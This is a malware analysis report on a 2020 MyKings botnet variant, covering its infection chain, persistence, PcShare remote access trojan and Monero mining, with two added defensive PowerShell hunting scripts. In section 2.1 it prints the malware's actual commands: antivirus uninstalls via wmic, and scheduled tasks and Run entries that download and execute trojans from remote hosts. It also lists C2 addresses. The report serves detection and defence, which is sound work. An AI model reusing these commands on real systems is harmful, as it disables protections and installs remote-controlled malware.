MyKings botnet: new variant has infected more than 50,000 computers

2020-10-27 16:34:49

1. Background

The updated MyKings installs the open-source remote access trojan PcShare on infected systems and uses it to control the victim machine remotely: it can manipulate files, services, registry keys, processes, windows and other resources, and can download and execute arbitrary programs.

The MyKings bot also disables Windows Defender, detects and uninstalls common antivirus products, removes competing miners and its own older miner versions, downloads the "DarkCloud" (暗云) trojan to infect the hard disk's master boot record (MBR) for long-term residence, and achieves autostart through scheduled tasks, Run entries and similar mechanisms.

MyKings first appeared around February 2017. The botnet breaks into victim hosts by scanning the Internet for port 1433 and several other ports, then spreads malicious code for a variety of purposes, including DDoS, Proxy, RAT (remote access trojan), Miner (mining trojan) and DarkCloud III. Because MyKings spreads actively and affects a wide range of systems, it is a serious threat to enterprise users. Based on the Monero wallet's hash rate of 1000 KH/s, we estimate that MyKings currently controls more than 50,000 computers for mining.

2. Sample analysis

MyKings attacks Windows servers by brute-forcing MSSQL (port 1433). After a successful login it executes the PowerShell script power.txt. Power.txt first disables Windows Defender features, then downloads kill.txt to clean up the old miner.

Kill.txt matches old miner programs by process name; an entry marked "1" means the corresponding WMI startup entry is also removed. Process names commonly used by MyKings in this list include:

uihost64.exe、dhelper.exe、msinfo.exe、u.exe、lsmose.exe、lsmos.exe、lsmo.exe、csrw.exe、csrw.exe、lsmosee.exe、lsmma.exe、lsmm.exe、lsmmaa.exe、lsmma.exe、new.exe、upsupx.exe、lsma.exe、lsmab.exe、lsmaaa.exe、lsma30.exe、lsma31.exe

It deletes the old WMI event filter "fuckyoumm2_filter" and event consumer "fuckyoumm2_consumer", thereby removing the old WMI startup entry.

2.1 Persistence

Power.txt then downloads and runs uninstall.txt, which uninstalls antivirus software, deletes the old miner, and establishes local persistence through a Windows scheduled task, a Run key entry and a WMI startup entry.

1. Uninstall the specified antivirus products;

wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive

wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive

wmic.exe product where "name like '%avast%'" call uninstall /nointeractive

wmic.exe product where "name like '%avp%'" call uninstall /nointeractive

wmic.exe product where "name like '%Security%'" call uninstall /nointeractive

wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive

wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive

cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart

2. Install scheduled task "oka" to launch the new miner lsma12.exe, and terminate the java.exe process (the old miner);

schtasks /create /tn "oka" /tr "cmd /c start c:\windows\inf\aspnet\lsma12.exe -p" /ru "system" /sc onstart /F
wmic.exe process where ExecutablePath='c:\windows\java\java.exe' call Terminate

3. Install scheduled tasks "Mysa" and "Mysa2", which run at every system start: they log in to the FTP server ftp[.]ftp0930[.]host with username test and password 1433, download the trojans a1.exe and s1.rar, and execute them;

schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp0930.host >s
echo test>>s
echo 1433>>s
echo binary>>s
echo get a1.exe c:\windows\update.exe>>s
echo bye>>s
ftp -s:s
c:\windows\update.exe" /ru "system" /sc onstart /F
schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp0930.host>ps
echo test>>ps
echo 1433>>ps
echo get s1.rar c:\windows\help\lsmosee.exe>>ps
echo bye>>ps
ftp -s:ps
c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F

4. Deny the "system" account access to specified files and paths (so the old components can no longer run);

cacls c:\windows\java\java.exe /e /d system
cacls c:\windows\temp\servtestdos.dll /e /d system
cacls C:\WINDOWS\Fonts\cd /e /d system

5. Install the Run entry "start", which downloads and executes the scriptlet v1.sct through regsvr32 and scrobj.dll; at the same time delete the old entry "start1" and the old scheduled tasks "Mysa3", "ok", "Mysa1" and "my1".

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr*32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll" /f
reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr*32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll" /f
reg delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v "start1" /f
SCHTASKS /Delete /TN "Mysa3" /F
SCHTASKS /Delete /TN "ok" /F
SCHTASKS /Delete /TN "Mysa1" /F
SCHTASKS /Delete /TN "my1" /F

6. Delete the old WMI startup entry named "coronav" (after the coronavirus) and install a new "coronav" WMI entry, which uses PowerShell to download and execute the following scripts:

http[:]//ruisgood.ru/power.txt
http[:]//gamesoxalic.com/power.txt

or uses regsvr*32 to download and execute these scripts:

http[:]//ruisgood.ru/s.txt
http[:]//gamesoxalic.com/s.txt

7. Install the WMI startup entries "fuckamm3" and "fuckamm4" to launch the new miner.

8. Download.txt downloads the Monero miner, the MyKings updater and the DarkCloud MBR infector.
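The following hunting script is an added example written for this article; it is not code from the report or from the malware. It checks a Windows host for the persistence artifacts described in steps 2 to 7 above (task names, the Run entries, the WMI subscription names, and the dropped files). It assumes an elevated PowerShell 5.1 or later on Windows 8/Server 2012 or newer; the file paths are the report's paths with the directory separators restored.

```powershell
# Added hunting script (not part of the report): checks a Windows host for the
# MyKings persistence artifacts described in section 2.1. Run elevated.
$findings = New-Object System.Collections.Generic.List[string]

# 1. Scheduled task names used by the new and old MyKings versions
$taskNames = 'oka','Mysa','Mysa1','Mysa2','Mysa3','ok','my1'
Get-ScheduledTask -ErrorAction SilentlyContinue |
  Where-Object { $taskNames -contains $_.TaskName } |
  ForEach-Object {
    $action = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
    $findings.Add("Scheduled task '$($_.TaskName)': $action")
  }

# 2. Run keys: value 'start'/'start1', or any value that runs regsvr32 with a
#    remote .sct scriptlet through scrobj.dll (the v1.sct technique above)
$runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
foreach ($key in $runKeys) {
  $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
  if (-not $props) { continue }
  foreach ($p in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
    $val = [string]$p.Value
    if ($p.Name -in 'start','start1' -or $val -match 'regsvr32.*[/-]i:http\S*\.sct\s+scrobj\.dll') {
      $findings.Add("Run value '$($p.Name)' under $key = $val")
    }
  }
}

# 3. WMI event subscriptions (filters and consumers) with the names the report lists
$wmiNames = 'fuckyoumm2_filter','fuckyoumm2_consumer','coronav','fuckamm3','fuckamm4'
foreach ($class in '__EventFilter','CommandLineEventConsumer','ActiveScriptEventConsumer') {
  Get-CimInstance -Namespace root\subscription -ClassName $class -ErrorAction SilentlyContinue |
    Where-Object { $wmiNames -contains $_.Name -or $_.Name -like 'fuck*' -or $_.Name -like 'coronav*' } |
    ForEach-Object { $findings.Add("WMI $class '$($_.Name)'") }
}

# 4. Files the tasks drop or launch (paths from the report, separators restored)
$paths = "$env:SystemRoot\inf\aspnet\lsma12.exe", "$env:SystemRoot\update.exe",
         "$env:SystemRoot\help\lsmosee.exe", "$env:SystemRoot\java\java.exe"
foreach ($f in $paths) { if (Test-Path -LiteralPath $f) { $findings.Add("File present: $f") } }

if ($findings.Count -eq 0) { 'No MyKings persistence artifacts found.' }
else { $findings | ForEach-Object { "[!] $_" } }
```

The WMI check matches on name only; on a host with findings, also dump the __FilterToConsumerBinding instances in root\subscription before removing anything, so the filter/consumer pairs can be cleaned up together.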

2.2 Self-update

The ups.dat fetched by Download.txt is a self-extracting archive. When unpacked it drops several files into the temp directory and performs the update operations: removing competing miners, downloading and starting the miner, and installing startup entries. The dropped files are:

c:\windows\temp\ntuser.dat

c:\windows\temp\upx.exe

%temp%\c3.bat

%temp%\excludes

%temp%\n.vbs

The "DarkCloud" trojan max.rar, also downloaded by Download.txt, infects the MBR and executes shellcode that retrieves a payload from the cloud and ultimately fetches the MyKings trojan files. The network traffic for the payload download is as follows:

First, cmd.txt is downloaded from the C2 server http[:]//95.214.9.95/pld/cmd.txt.

Then a check-in is sent to the server (http[:]//95.214.9.95/pld/login.aspx?uid=&info=). The parameters are the device identifier uid and info; info contains the computer name, egress IP, CPU model, CPU count and memory size, and is base64-encoded. After receiving the data the server responds with "AcceptOK".

2.3 PcShare remote access trojan

The 20200809.rar that the returned cmd.txt specifies for download is the open-source PcShare RAT, of which several versions exist on GitHub (https[:]//github.com/LiveMirror/pcshare). After download the trojan is copied to c:\windows\debug\item.dat and launched with:

rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa

PcShare performs the following remote-control functions on command from the server. Because its source code is available on several sharing platforms, attackers can freely download, modify and recompile it.

1. Enumerate, create, rename and delete files and directories

2. Enumerate and terminate processes

3. Edit registry keys and values

4. Enumerate and modify services

5. Enumerate and control windows

6. Execute binaries

7. Download additional files from the C&C or a supplied URL

8. Upload files to the C&C

9. Execute shell commands

10. Display message boxes

11. Restart or shut down the system

PcShare connects to the C2 server 192.187.111.66:5566.
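The following check is an added example written for this article, not code from the report or from PcShare. It looks for the three PcShare artifacts named in this section: the renamed DLL at c:\windows\debug\item.dat (path from the report, separators restored), a rundll32 process invoking its ServiceMain export, and a TCP session to the C2 address or port. It assumes an elevated PowerShell on Windows 8/Server 2012 or newer (Get-NetTCPConnection).

```powershell
# Added check (not part of the report): PcShare loader and C2 session from section 2.3.
$c2Ip   = '192.187.111.66'
$c2Port = 5566
$dat    = "$env:SystemRoot\debug\item.dat"   # report path, separators restored

# The implant is a DLL renamed to .dat and started with rundll32 <dat>,ServiceMain.
# A .dat file that begins with the 'MZ' PE magic is a strong signal on its own.
if (Test-Path -LiteralPath $dat) {
  $bytes = [System.IO.File]::ReadAllBytes($dat)
  $isPe  = ($bytes.Length -ge 2) -and ($bytes[0] -eq 0x4D) -and ($bytes[1] -eq 0x5A)
  $md5   = (Get-FileHash -LiteralPath $dat -Algorithm MD5).Hash
  "[!] $dat present (PE header: $isPe, MD5: $md5)"
}

# Running rundll32 instances whose command line references the .dat or ServiceMain
Get-CimInstance -ClassName Win32_Process -Filter "Name='rundll32.exe'" |
  Where-Object { $_.CommandLine -match 'item\.dat|ServiceMain' } |
  ForEach-Object { "[!] rundll32 PID $($_.ProcessId): $($_.CommandLine)" }

# TCP connections (any state) to the C2 address, or to port 5566 anywhere
Get-NetTCPConnection -ErrorAction SilentlyContinue |
  Where-Object { $_.RemoteAddress -eq $c2Ip -or $_.RemotePort -eq $c2Port } |
  ForEach-Object {
    $owner = (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName
    "[!] $($_.LocalAddress):$($_.LocalPort) -> $($_.RemoteAddress):$($_.RemotePort) [$($_.State)] owner=$owner PID=$($_.OwningProcess)"
  }
```

A hit on the port alone is only a lead, since 5566 is not reserved; confirm with the file and process checks before acting.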

2.4 Mining

Download.txt downloads the XMRig miner from http[:]//ruisgood.ru/1201.rar and the mining configuration file from http[:]//ruisgood.ru/config2.json, then starts the mining process:

c:\windows\inf\aspnet\lsma12.exe

Mining pool used: xmr-eu1.nanopool.org:14444

Monero wallet:

4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka

Querying this wallet shows 143 XMR mined so far, worth more than ¥80,000. Its pool hash rate averages 1000 KH/s (earning about US$100 per day), from which we estimate that roughly 50,000 computers are being used for mining.

IOCs
